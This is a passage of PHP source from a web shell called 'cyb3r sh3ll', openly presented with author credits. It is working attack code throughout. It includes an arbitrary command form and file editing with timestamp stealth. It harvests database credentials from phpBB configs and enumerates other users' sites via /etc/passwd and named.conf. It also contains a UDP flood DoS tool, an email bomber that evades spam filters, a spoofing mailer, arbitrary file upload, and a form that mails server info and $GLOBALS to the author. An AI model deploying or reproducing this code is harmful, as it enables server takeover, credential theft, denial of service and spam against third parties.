4541 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
4542
4543 }
4544
4545 elseif($base64 == 4)
4546
4547 {
4548
4549 $text = file_get_contents($d.$f);
4550
4551 $encoded = base64_decode($text);
4552
4553 echo "<b>Base64 Decode";
4554
4555 if (base64_encode($encoded) != $text) {echo " (failed)";}
4556
4557 echo "</b><br>";
4558
4559 }
4560
4561 if (!empty($encoded))
4562
4563 {
4564
4565 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
4566
4567 }
4568
4569 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
4570
4571<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
4572
4573<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
4574
4575<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
4576
4577<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
4578
4579<P>";
4580
4581 }
4582
4583 elseif ($ft == "html")
4584
4585 {
4586
4587 if ($white) {@ob_clean();}
4588
4589 echo $r;
4590
4591 if ($white) {cyb3rexit();}
4592
4593 }
4594
4595 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
4596
4597 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
4598
4599 elseif ($ft == "phpsess")
4600
4601 {
4602
4603 echo "<pre>";
4604
4605 $v = explode("|",$r);
4606
4607 echo $v[0]."<br>";
4608
4609 var_dump(unserialize($v[1]));
4610
4611 echo "</pre>";
4612
4613 }
4614
4615 elseif ($ft == "exe")
4616
4617 {
4618
4619 $ext = explode(".",$f);
4620
4621 $c = count($ext)-1;
4622
4623 $ext = $ext[$c];
4624
4625 $ext = strtolower($ext);
4626
4627 $rft = "";
4628
4629 foreach($exeftypes as $k=>$v)
4630
4631 {
4632
4633 if (in_array($ext,$v)) {$rft = $k; break;}
4634
4635 }
4636
4637 $cmd = str_replace("%f%",$f,$rft);
4638
4639 echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
4640
4641 }
4642
4643 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
4644
4645 elseif ($ft == "code")
4646
4647 {
4648
4649 if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
4650
4651 {
4652
4653 $arr = explode("\n",$r);
4654
4655 if (count($arr == 18))
4656
4657 {
4658
4659 include($d.$f);
4660
4661 echo "<b>phpBB configuration is detected in this file!<br>";
4662
4663 if ($dbms == "mysql4") {$dbms = "mysql";}
4664
4665 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
4666
4667 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";}
4668
4669 echo "Parameters for manual connect:<br>";
4670
4671 $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
4672
4673 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
4674
4675 echo "</b><hr size=\"1\" noshade>";
4676
4677 }
4678
4679 }
4680
4681 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
4682
4683 if (!empty($white)) {@ob_clean();}
4684
4685 highlight_file($d.$f);
4686
4687 if (!empty($white)) {cyb3rexit();}
4688
4689 echo "</div>";
4690
4691 }
4692
4693 elseif ($ft == "download")
4694
4695 {
4696
4697 @ob_clean();
4698
4699 header("Content-type: application/octet-stream");
4700
4701 header("Content-length: ".filesize($d.$f));
4702
4703 header("Content-disposition: attachment; filename=\"".$f."\";");
4704
4705 echo $r;
4706
4707 exit;
4708
4709 }
4710
4711 elseif ($ft == "notepad")
4712
4713 {
4714
4715 @ob_clean();
4716
4717 header("Content-type: text/plain");
4718
4719 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
4720
4721 echo($r);
4722
4723 exit;
4724
4725 }
4726
4727 elseif ($ft == "img")
4728
4729 {
4730
4731 $inf = getimagesize($d.$f);
4732
4733 if (!$white)
4734
4735 {
4736
4737 if (empty($imgsize)) {$imgsize = 20;}
4738
4739 $width = $inf[0]/100*$imgsize;
4740
4741 $height = $inf[1]/100*$imgsize;
4742
4743 echo "<center><b>Size:</b>&nbsp;";
4744
4745 $sizes = array("100","50","20");
4746
4747 foreach ($sizes as $v)
4748
4749 {
4750
4751 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
4752
4753 if ($imgsize != $v ) {echo $v;}
4754
4755 else {echo "<u>".$v."</u>";}
4756
4757 echo "</a>&nbsp;&nbsp;&nbsp;";
4758
4759 }
4760
4761 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
4762
4763 }
4764
4765 else
4766
4767 {
4768
4769 @ob_clean();
4770
4771 $ext = explode($f,".");
4772
4773 $ext = $ext[count($ext)-1];
4774
4775 header("Content-type: ".$inf["mime"]);
4776
4777 readfile($d.$f);
4778
4779 exit;
4780
4781 }
4782
4783 }
4784
4785 elseif ($ft == "edit")
4786
4787 {
4788
4789 if (!empty($submit))
4790
4791 {
4792
4793 if ($filestealth) {$stat = stat($d.$f);}
4794
4795 $fp = fopen($d.$f,"w");
4796
4797 if (!$fp) {echo "<b>Can't write to file!</b>";}
4798
4799 else
4800
4801 {
4802
4803 echo "<b>Saved!</b>";
4804
4805 fwrite($fp,$edit_text);
4806
4807 fclose($fp);
4808
4809 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
4810
4811 $r = $edit_text;
4812
4813 }
4814
4815 }
4816
4817 $rows = count(explode("\r\n",$r));
4818
4819 if ($rows < 10) {$rows = 10;}
4820
4821 if ($rows > 30) {$rows = 30;}
4822
4823 echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
4824
4825 }
4826
4827 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
4828
4829 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
4830
4831 }
4832
4833}
4834
4835if ($act == "about")
4836{
4837echo '<table align="center"><tr><td><b><font color="orange">Script:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>
4838Name: cyb3r sh3ll<br>Version: '.$shver.'</font><br/><br/>Author:<br>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br>
4839Name: cyb3r 9l4d!470r (Cyber Gladiator)<br>Country: India<br>Website: ????...<br>Email: cyb3r.gladiat0r@gmail.com
4840<a href="mailto:cyb3r.gladiat0r@gmail.com"></a><br/><br/><font color="green">Greetings:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>r45c4l bro you are my source of inspiration.<br/>r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.<br/>Thanks all who report bugs and send to my email id.</font><br/></b></td></tr></table>';
4841}
4842
4843if ($act == "dos")
4844{
4845?><center><br><br><img src="http://s15.postimage.org/5q2io54zv/dos.png"><br>
4846<b>Server IP:</b> <font color="green"><?php echo $_SERVER["SERVER_ADDR"]; ?></font><br><br>
4847<b>Your IP:</b> <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
4848<form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="ddos">
4849IP:
4850<input type="text" name="ip" size="15" maxlength="15" class="main" value = "127.0.0.1" onblur = "if ( this.value=='' ) this.value = '127.0.0.1';" onfocus = " if ( this.value == '127.0.0.1' ) this.value = '';">
4851&nbsp;&nbsp;&nbsp;&nbsp;Time:
4852<input type="text" name="time" size="14" maxlength="20" class="main" value = "10" onblur = "if ( this.value=='' ) this.value = '10';" onfocus = " if ( this.value == '10' ) this.value = '';">
4853&nbsp;&nbsp;&nbsp;&nbsp;Port:
4854<input type="text" name="port" size="5" maxlength="5" class="main" value = "80" onblur = "if ( this.value=='' ) this.value = '80';" onfocus = " if ( this.value == '80' ) this.value = '';">
4855<br><br>
4856<input type="submit" value=" Start the Attack---> ">
4857<br><br>
4858<center>After initiating the DoS attack, please wait while the browser loads.</center></form></center><?php
4859}
4860
4861if ($act == "ddos")
4862{
4863$packets = 0;
4864$ip = $_POST['ip'];
4865$rand = $_POST['port'];
4866set_time_limit(0);
4867ignore_user_abort(FALSE);
4868
4869$exec_time = $_POST['time'];
4870
4871$time = time();
4872echo "<script>alert('Dos Completed!');</script>";
4873print "Flooded: $ip on port $rand <br><br>";
4874$max_time = $time+$exec_time;
4875
4876
4877
4878for($i=0;$i<65535;$i++){
4879 $out .= "X";
4880}
4881while(1){
4882$packets++;
4883 if(time() > $max_time){
4884 break;
4885 }
4886
4887 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
4888 if($fp){
4889 fwrite($fp, $out);
4890 fclose($fp);
4891 }
4892}
4893echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
4894}
4895
4896if ($act == "localdomain")
4897{
4898echo "<br><center><a href=\"".$surl."act=local\" ><b><u>Sites on this server.</u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=readable\" ><b><u>List of Users.</u></b></a></center><br>";
4899}
4900
4901 if ($act == "local")
4902 {
4903 //radable public_html
4904 $file = @implode(@file("/etc/named.conf"));
4905 if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
4906 preg_match_all("#named/(.*?).db#",$file ,$r);
4907 $domains = array_unique($r[1]);
4908
4909 function check()
4910 {
4911 (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):"";
4912 }
4913
4914 check();
4915
4916 echo "<table align=center border=1 width=59% cellpadding=5>
4917 <tr><td colspan=2>[+] Here : [ <b>".count($domains)."</b> ] Domain ...</td></tr>
4918 <tr><td><b>List of Domains</b></td><td><b>List of Users</b></td></tr>";
4919
4920 foreach($domains as $domain)
4921 {
4922 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
4923 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
4924 }
4925
4926 echo "</table>";
4927//radable public_html
4928 }
4929
4930 if ($act == "readable")
4931 {
4932 //entries in passwd file
4933($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
4934set_time_limit(0);
4935###################
4936@$passwd = fopen('/etc/passwd','r');
4937if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
4938$pub = array();
4939$users = array();
4940$conf = array();
4941$i = 0;
4942while(!feof($passwd))
4943{
4944$str = fgets($passwd);
4945if ($i > 35)
4946{
4947$pos = strpos($str,':');
4948$username = substr($str,0,$pos);
4949$dirz = '/home/'.$username.'/public_html/';
4950if (($username != ''))
4951{
4952if (is_readable($dirz))
4953{
4954array_push($users,$username);
4955array_push($pub,$dirz);
4956}
4957}
4958}
4959$i++;
4960}
4961###################
4962echo '<br><br><textarea class="output" >';
4963echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
4964echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
4965echo "[~] Searching for passwords in config files...\n\n";
4966foreach ($users as $user)
4967{
4968$path = "/home/$user/public_html/";
4969echo "$path \n";
4970}
4971echo "\n";
4972echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <- that's on the menu -> Explorer \n";
4973echo "[+] Done ...\n";
4974echo '</textarea><br><br>Coded by <b>cyb3r 9l4d!470r</b> <a href=#/>Homepage</a>';
4975
4976
4977 }
4978
4979
4980 if ($act == "mailer")
4981 {
4982 ?> <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%" border=1>
4983 <tr> <!-- 1 -->
4984 <td valign="top" width="33%" ><p align="center"><b>(: E-Mail Bomber :)</b></p></td>
4985 <td valign="top" width="33%" ><p align="center"><b>[: Mass Mailer :]</b></p></td>
4986 <td valign="top" ><p align="center"><b>{: Anonymous Mailer :}</b></p></td>
4987 </tr>
4988 <tr><!-- 2 -->
4989 <td valign="top" ><center>
4990 <?php
4991 if(
4992 isset($_POST['to']) &&
4993 isset($_POST['subject']) &&
4994 isset($_POST['message']) &&
4995 isset($_POST['times']) &&
4996 $_POST['to'] != '' &&
4997 $_POST['subject'] != '' &&
4998 $_POST['message'] != '' &&
4999 $_GET['act'] =='mailbomber' &&
5000 $_POST['times'] != ''
5001 )
5002 {
5003 $times = $_POST['times'];
5004 while($times--)
5005 {
5006 if(isset($_POST['padding']))
5007 {
5008 $fromPadd = rand(0,9999);
5009 $subjectPadd = " -- ID : ".rand(0,9999999);
5010 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
5011
5012 }
5013 $from = "your$fromPadd@email.id";
5014 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
5015 {
5016 $error = 1;
5017 echo "<font color='red'>Some Error Occured!</font>";
5018 break;
5019 }
5020 }
5021 if($error != 1)
5022 { echo "<font color='green'>Mail(s) Sent!</font>"; }
5023 }
5024 else
5025 {
5026 ?>
5027 <form method="post" action ="<?php echo $surl."act=mailbomber";?>">
5028 <table>
5029 <tr>
5030 <td >
5031 To
5032 </td>
5033 <td>
5034 <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com,victim@target.com,victim2@target.com';"/>
5035 </td>
5036 </tr>
5037
5038 <tr>
5039 <td class="title">
5040 Subject
5041 </td>
5042 <td>
5043 <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
5044 </td>
5045 </tr>
5046 <tr>
5047 <td >
5048 No. of Times
5049 </td>
5050 <td>
5051 <input name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
5052 </td>
5053 </tr>
5054
5055 <tr>
5056 <td>
5057
5058 Pad your message (Less spam detection)
5059
5060 </td>
5061 <td>
5062
5063 <input type="checkbox" name="padding"/>
5064
5065 </td>
5066 </tr>
5067 <tr>
5068 <td >
5069 <textarea name="message" cols="25" rows="5" value="cyb3r-sh3ll Rocks!!.." onfocus="if(this.value == 'cyb3r-sh3ll Rocks!! ..')this.value = '';" onblur="if(this.value=='')this.value='cyb3r-sh3ll Rocks!! ..';">cyb3r-sh3ll Rocks!!</textarea>
5070 </td>
5071 <td >
5072 <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
5073 </td>
5074 </tr>
5075
5076
5077
5078 </table>
5079 </form>
5080 <?php
5081 }
5082 ?>
5083
5084 </center></td>
5085
5086 <td valign="top"><center>
5087 <?PHP
5088 if(
5089 isset($_POST['to']) &&
5090 isset($_POST['from']) &&
5091 isset($_POST['subject']) &&
5092 $_GET['act'] =='massmailer' &&
5093 isset($_POST['message'])
5094 )
5095 {
5096
5097 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
5098 {
5099 echo "<font color='green'>Mail Sent!</font>";
5100 }
5101 else
5102 {
5103 echo "<font color='red'>Some Error Occured!</font>";
5104 }
5105 }
5106 else
5107 {
5108 ?>
5109 <form method="POST" action="<?php echo $surl."act=massmailer";?>">
5110
5111 <table >
5112 <tr>
5113 <td >
5114 From
5115 </td>
5116 <td>
5117 <input name="from" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/>
5118 </td>
5119 </tr>
5120
5121 <tr>
5122 <td >
5123 To
5124 </td>
5125 <td>
5126 <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@target.com,victim2@target.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com';"/>
5127 </td>
5128 </tr>
5129
5130 <tr>
5131 <td class="title">
5132 Subject
5133 </td>
5134 <td>
5135 <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
5136 </td>
5137 </tr>
5138
5139
5140 <tr>
5141 <td >
5142 <textarea name="message" cols="25" rows="5" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
5143 </td>
5144 <td >
5145 <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
5146 </td>
5147 </tr>
5148
5149
5150
5151 </table>
5152 </form>
5153 <?php
5154 }
5155
5156?>
5157 </center>
5158 </td>
5159
5160 <td ><center>
5161
5162 <form action="" method="post" enctype="multipart/form-data">
5163 <table border="0" class="full">
5164 <tr><td class="taright"><label for="fromname" accesskey="r" class="sbold">F<span class="underline">r</span>om Name:</label></td><td colspan="2"><input type="text" id="fromname" name="fromname" maxlength="100" class="full" /><label for="from" accesskey="f" class="sbold"><span class="underline">F</span>rom E-mail:</label></td><td colspan="2"><input type="text" id="from" name="from" maxlength="100" class="full" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/></td></tr>
5165
5166 <tr><td class="taright"><label for="rcpt" accesskey="o" class="sbold">T<span class="underline">o</span>:</label></td><td colspan="2"><input type="text" id="rcpt" name="rcpt" maxlength="100" class="full" /><label for="subject" accesskey="j" class="sbold">Sub<span class="underline">j</span>ect:</label></td><td colspan="2"><input type="text" id="subject" name="subject" maxlength="100" class="full" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';"/></td></tr>
5167
5168 <tr><td class="taright"><label for="reply" accesskey="p" class="sbold opt">Re<span class="underline">p</span>ly-To:</label></td><td colspan="2"><input type="text" id="reply" name="reply" maxlength="100" class="full" /><label for="errors" accesskey="s" class="sbold opt">Error<span class="underline">s</span>-To:</label></td><td colspan="2"><input type="text" id="errors" name="errors" maxlength="100" class="full" /></td></tr>
5169
5170 <tr><td class="taright"><label for="bcc" accesskey="b" class="sbold opt"><span class="underline">B</span>CC:</label></td><td colspan="2"><input type="text" id="bcc" name="bcc" maxlength="100" class="full" /><label for="attachment" accesskey="t" class="sbold opt">A<span class="underline">t</span>tachment:</label></td><td colspan="2"><input type="file" id="attachment" name="attachment" class="full" /></td></tr>
5171
5172 <tr><td class="taright sbold opt">Priority:</td><td colspan="2"><input type="radio" name="importance" id="lowest" value="lowest" /><label for="lowest" accesskey="w">&nbsp;Lo<span class="underline">w</span></label><input type="radio" name="importance" id="normal" value="normal" class="rbtn" checked="checked" /><label for="normal" accesskey="m">&nbsp;Nor<span class="underline">m</span>al</label><input type="radio" name="importance" id="highest" value="highest" class="rbtn" /><label for="highest" accesskey="g">&nbsp;Hi<span class="underline">g</span>h</label></td></tr>
5173
5174 <tr><td class="vatop taright"><label for="xmailer" accesskey="l" class="sbold opt"><span id="mailer">X-Mai<span class="underline">l</span>er:</span></label></td><td colspan="2">
5175 <select name="xmailer" id="xmailer">
5176 <option value="0" selected="selected">- none -</option>
5177 <option value="1">Apple Mail</option>
5178 <option value="2">ColdFusion MX Application Server</option>
5179 <option value="3">E-Messenger</option>
5180 <option value="4">KMail</option>
5181
5182 <option value="5">Lotus Notes</option>
5183 <option value="6">Microsoft Office Outlook</option>
5184 <option value="7">Microsoft Outlook Express</option>
5185 <option value="8">Microsoft Outlook IMO</option>
5186 <option value="9">Microsoft Windows Live Mail</option>
5187 <option value="10">Microsoft Windows Mail</option>
5188 <option value="11">Mozilla Thunderbird</option>
5189 <option value="12">Novell GroupWise</option>
5190 <option value="13">Novell GroupWise Internet Agent</option>
5191 <option value="14">QUALCOMM Windows Eudora Version</option>
5192 <option value="15">The Bat!</option>
5193 <option value="16">YahooMailClassic YahooMailWebService</option>
5194 <option value="99">Custom...</option>
5195 </select>
5196
5197 </td></tr>
5198
5199 <tr><td class="taright"><label for="date" accesskey="d" class="sbold opt"><span class="underline">D</span>ate:</label></td><td colspan="2"><input type="text" id="date" name="date" maxlength="50" value="Thu, 10 Nov 2011 18:41:04 +0100" class="datewidth" />&nbsp;<input type="checkbox" id="current" name="current" checked="checked" /><label for="current" accesskey="u">&nbsp;C<span class="underline">u</span>rrent</label></td></tr>
5200 <tr><td class="taright"><label for="charset" accesskey="a" class="sbold opt">Ch<span class="underline">a</span>rset:</label></td><td class="cchs">
5201 <select name="charset" id="charset" class="full">
5202 <option value="big5">big5</option>
5203 <option value="euc-kr">euc-kr</option>
5204 <option value="iso-2202-jp">iso-2202-jp</option>
5205 <option value="iso-8859-1">iso-8859-1</option>
5206 <option value="iso-8859-2">iso-8859-2</option>
5207 <option value="iso-8859-3">iso-8859-3</option>
5208 <option value="iso-8859-4">iso-8859-4</option>
5209 <option value="iso-8859-5">iso-8859-5</option>
5210 <option value="iso-8859-6">iso-8859-6</option>
5211 <option value="iso-8859-7">iso-8859-7</option>
5212 <option value="iso-8859-8">iso-8859-8</option>
5213 <option value="koi8-r">koi8-r</option>
5214 <option value="shift-jis">shift-jis</option>
5215 <option value="utf-8" selected="selected">utf-8</option>
5216 <option value="windows-1250">windows-1250</option>
5217 <option value="windows-1251">windows-1251</option>
5218 <option value="windows-1252">windows-1252</option>
5219 <option value="windows-1253">windows-1253</option>
5220 <option value="windows-1254">windows-1254</option>
5221 <option value="windows-1255">windows-1255</option>
5222 <option value="windows-1256">windows-1256</option>
5223 <option value="windows-1257">windows-1257</option>
5224 <option value="windows-1258">windows-1258</option>
5225 <option value="windows-874">windows-874</option>
5226 <option value="x-euc">x-euc</option>
5227 <option value="99">Custom...</option>
5228 </select>
5229 </td><td><input type="text" name="mycharset" maxlength="50" class="full" /></td></tr>
5230 <tr><td class="taright sbold opt">Content-Type:</td><td colspan="2"><input type="radio" name="ctype" id="plain" value="plain" checked="checked" /><label for="plain" accesskey="n">&nbsp;text/plai<span class="underline">n</span></label><input type="radio" name="ctype" id="html" value="html" class="rbtn" /><label for="html" accesskey="h" id="mrk">&nbsp;text/<span class="underline">h</span>tml</label><input type="hidden" name="rte" value="0" /></td></tr>
5231 <tr><td class="vatop taright"><label for="text" accesskey="x" class="sbold">Te<span class="underline">x</span>t:</label></td><td colspan="2"><textarea cols="30" rows="5" id="text" name="text" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';" />I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea></td></tr>
5232 <tr><td></td><td colspan="2"><input type="reset" value="Clear" class="btn" /> <input type="submit" name="ok" value="Send" class="btn sbold slarger" /></td></tr>
5233 </table>
5234 </form>
5235
5236 </center></td>
5237
5238 </tr>
5239
5240 </table> <?php
5241 }
5242
5243 if ($act == "nettools")
5244{
5245echo "<br><center><a href=\"".$surl."act=proxy\" ><b><u>Proxy </u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=whois\" ><b><u>Whois </u></b></a></center><br>";
5246}
5247
5248 if ($act == "feedback")
5249
5250{
5251
5252 $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ==");
5253
5254 if (!empty($submit))
5255
5256 {
5257
5258 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
5259
5260 $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
5261
5262 if (!empty($fdbk_ref))
5263
5264 {
5265
5266 $tmp = @ob_get_contents();
5267
5268 ob_clean();
5269
5270 phpinfo();
5271
5272 $phpinfo = base64_encode(ob_get_contents());
5273
5274 ob_clean();
5275
5276 echo $tmp;
5277
5278 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
5279
5280 }
5281
5282 mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
5283
5284 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
5285
5286 }
5287
5288 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Hindi.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
5289
5290}
5291
5292if ($act == "systeminfo") {echo system('systeminfo');}
5293
5294if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); }
5295
5296if ($act == "upload")
5297
5298{
5299 echo "<b>File upload:</b><br><form enctype=\"multipart/form-data\" action=\"\" method=POST>
5300
5301Select file on your local computer: <input name=\"uploaded\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
5302
5303Save this file dir: <input name=\"path\" size=\"70\" value=\"".getcwd()."\"><br><br>
5304
5305File-name (auto-fill): <input name=uploadfilename size=25><br><br>
5306
5307<input type=submit name=submit value=\"Upload\">
5308
5309</form>";
5310$target = $_POST['path'];
5311 $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ;
5312 $ok=1;
5313if (isset($_FILES['uploaded']['name'])) {
5314 if (file_exists($target))
5315 {
5316 echo $_FILES["uploaded"]["name"] . " already exists. ";
5317 }
5318 else
5319 {
5320 if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
5321 {
5322 echo "Upload: " . $_FILES["uploaded"]["name"] . "<br />";
5323 echo "Type: " . $_FILES["uploaded"]["type"] . "<br />";
5324 echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb<br />";
5325 echo "Stored in: " . $target;
5326 }
5327 else
5328 {
5329 echo "Sorry, there was a problem uploading your file.";
5330 }
5331 }
5332 }
5333}
5334if ($act == "whois")
5335{
5336global $t,$hcwd;
5337if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
5338$server =$_REQUEST['server'];
5339$domain=$_REQUEST['domain']."\r\n";
5340$ser=fsockopen($server,43,$en,$es,5);
5341fputs($ser,$domain);
5342echo "<pre>";
5343while(!feof($ser))echo fgets($ser);
5344echo "</pre>";
5345fclose($ser);
5346}
5347else{
